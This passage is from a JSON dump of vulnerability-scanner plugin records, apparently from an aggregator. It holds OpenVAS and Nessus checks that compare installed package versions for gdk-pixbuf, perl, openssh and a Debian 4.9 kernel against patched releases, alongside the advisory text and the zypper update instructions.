isrpmvuln(pkg:\"libgdk_pixbuf-2_0-0-debuginfo\", rpm:\"libgdk_pixbuf-2_0-0-debuginfo~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"typelib-1_0-GdkPixbuf-2_0\", rpm:\"typelib-1_0-GdkPixbuf-2_0~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-lang\", rpm:\"gdk-pixbuf-lang~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-devel-32bit\", rpm:\"gdk-pixbuf-devel-32bit~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-devel-debuginfo-32bit\", rpm:\"gdk-pixbuf-devel-debuginfo-32bit~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-query-loaders-32bit\", rpm:\"gdk-pixbuf-query-loaders-32bit~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gdk-pixbuf-query-loaders-debuginfo-32bit\", rpm:\"gdk-pixbuf-query-loaders-debuginfo-32bit~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgdk_pixbuf-2_0-0-32bit\", rpm:\"libgdk_pixbuf-2_0-0-32bit~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgdk_pixbuf-2_0-0-debuginfo-32bit\", rpm:\"libgdk_pixbuf-2_0-0-debuginfo-32bit~2.34.0~16.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-07-20T19:44:41", "references": ["2018:2010_1", "http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00023.html"], "pluginID": "1361412562310851818", "description": "Check the version of perl", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-20T00:00:00", "title": "SuSE Update for perl openSUSE-SU-2018:2010-1 (perl)", "type": "openvas", "enchantments": {"score": {"modified": "2018-07-20T19:44:41", "vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-12015"], "modified": "2018-07-20T00:00:00", "id": "OPENVAS:1361412562310851818", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851818", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2018_2010_1.nasl 10558 2018-07-20 14:08:23Z santu $\n#\n# SuSE Update for perl openSUSE-SU-2018:2010-1 (perl)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851818\");\n script_version(\"$Revision: 10558 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-20 16:08:23 +0200 (Fri, 20 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-20 05:54:42 +0200 (Fri, 20 Jul 2018)\");\n script_cve_id(\"CVE-2018-12015\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for perl openSUSE-SU-2018:2010-1 (perl)\");\n script_tag(name:\"summary\", value:\"Check the version of perl\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"\n This update for perl fixes the following issues:\n\n This security issue was fixed:\n\n - CVE-2018-12015: The Archive::Tar module allowed remote attackers to\n bypass a directory-traversal protection mechanism and overwrite\n arbitrary files (bsc#1096718)\n\n This non-security issue was fixed:\n\n - fix debugger crash in tab completion with Term::ReadLine::Gnu\n [bsc#1068565]\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended \n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-750=1\");\n script_tag(name:\"affected\", value:\"perl on openSUSE Leap 42.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2010_1\");\n script_xref(name:\"URL\" , value:\"http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00023.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base\", rpm:\"perl-base~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-debuginfo\", rpm:\"perl-base-debuginfo~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debugsource\", rpm:\"perl-debugsource~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-32bit\", rpm:\"perl-32bit~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-32bit\", rpm:\"perl-base-32bit~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-debuginfo-32bit\", rpm:\"perl-base-debuginfo-32bit~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo-32bit\", rpm:\"perl-debuginfo-32bit~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-doc\", rpm:\"perl-doc~5.18.2~15.2\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-07-21T12:00:44", "references": ["https://www.suse.com/security/cve/CVE-2016-10708.html", "http://www.nessus.org/u?581cecf7", "https://bugzilla.suse.com/1076957"], "pluginID": "111200", "description": "This update for openssh fixes the following issues: Security issue fixed :\n\n - CVE-2016-10708: Prevent DoS due to crashes caused by out-of-sequence NEWKEYS message (bsc#1076957).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2018:1989-1)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T12:00:44", "vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2018-1989-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111200", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1989-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111200);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/07/20 18:27:24\");\n\n script_cve_id(\"CVE-2016-10708\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2018:1989-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues: Security issue\nfixed :\n\n - CVE-2016-10708: Prevent DoS due to crashes caused by\n out-of-sequence NEWKEYS message (bsc#1076957).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1076957\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10708.html\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181989-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?581cecf7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-1352=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-1352=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2018-1352=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-askpass-gnome-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-debuginfo-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-debugsource-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-fips-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-helpers-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-helpers-debuginfo-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-74.19.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-74.19.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-07-21T12:29:07", "references": ["https://packages.debian.org/source/jessie/linux-latest-4.9", "https://lists.debian.org/debian-lts-announce/2018/07/msg00021.html"], "pluginID": "111166", "description": "Linux 4.9 has been packaged for Debian 8 as linux-4.9. This provides a supported upgrade path for systems that currently use kernel packages from the 'jessie-backports' suite.\n\nHowever, 'apt full-upgrade' will *not* automatically install the updated kernel packages. You should explicitly install one of the following metapackages first, as appropriate for your system :\n\nlinux-image-4.9-686 linux-image-4.9-686-pae linux-image-4.9-amd64 linux-image-4.9-armmp linux-image-4.9-armmp-lpae linux-image-4.9-marvell\n\nFor example, if the command 'uname -r' currently shows '4.9.0-0.bpo.6-amd64', you should install linux-image-4.9-amd64.\n\nThere is no need to upgrade systems using Linux 3.16, as that kernel version will also continue to be supported in the LTS period.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "Debian DLA-1424-1 : linux-latest-4.9 new package", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T12:29:07", "vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-07-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-image-4.9-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.9-686-pae", "cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:linux-image-4.9-686-pae", "p-cpe:/a:debian:debian_linux:linux-headers-4.9-marvell", "p-cpe:/a:debian:debian_linux:linux-headers-4.9-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.9-rt-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.9-686", "p-cpe:/a:debian:debian_linux:linux-image-4.9-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-image-4.9-rt-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.9-rt-686-pae-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.9-rt-686-pae", "p-cpe:/a:debian:debian_linux:linux-image-4.9-686-pae-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.9-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-image-4.9-marvell", "p-cpe:/a:debian:debian_linux:linux-headers-4.9-rt-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.9-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.9-armmp", "p-cpe:/a:debian:debian_linux:linux-headers-4.9-armmp", "p-cpe:/a:debian:debian_linux:linux-image-4.9-rt-686-pae", "p-cpe:/a:debian:debian_linux:linux-image-4.9-686"], "id": "DEBIAN_DLA-1424.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111166", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1424-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111166);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/20 18:27:23\");\n\n script_name(english:\"Debian DLA-1424-1 : linux-latest-4.9 new package\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Linux 4.9 has been packaged for Debian 8 as linux-4.9. This provides a\nsupported upgrade path for systems that currently use kernel packages\nfrom the 'jessie-backports' suite.\n\nHowever, 'apt full-upgrade' will *not* automatically install the\nupdated kernel packages. You should explicitly install one of the\nfollowing metapackages first, as appropriate for your system :\n\nlinux-image-4.9-686 linux-image-4.9-686-pae linux-image-4.9-amd64\nlinux-image-4.9-armmp linux-image-4.9-armmp-lpae\nlinux-image-4.9-marvell\n\nFor example, if the command 'uname -r' currently shows\n'4.9.0-0.bpo.6-amd64', you should install linux-image-4.9-amd64.\n\nThere is no need to upgrade systems using Linux 3.16, as that kernel\nversion will also continue to be supported in the LTS period.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00021.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux-latest-4.9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9-marvell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9-rt-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9-rt-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-marvell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-rt-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-rt-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-rt-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9-rt-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9-686\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9-686-pae\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9-amd64\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9-armmp\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9-armmp-lpae\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9-marvell\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9-rt-686-pae\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9-rt-amd64\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-686\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-686-pae\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-686-pae-dbg\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-amd64\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-amd64-dbg\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-armmp\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-armmp-lpae\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-marvell\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-rt-686-pae\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-rt-686-pae-dbg\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-rt-amd64\", reference:\"80+deb9u5~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9-rt-amd64-dbg\", reference:\"80+deb9u5~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-21T12:06:22", "references": ["http://www.nessus.org/u?dd175e6f"], "pluginID": "111185", "description": "New httpd packages 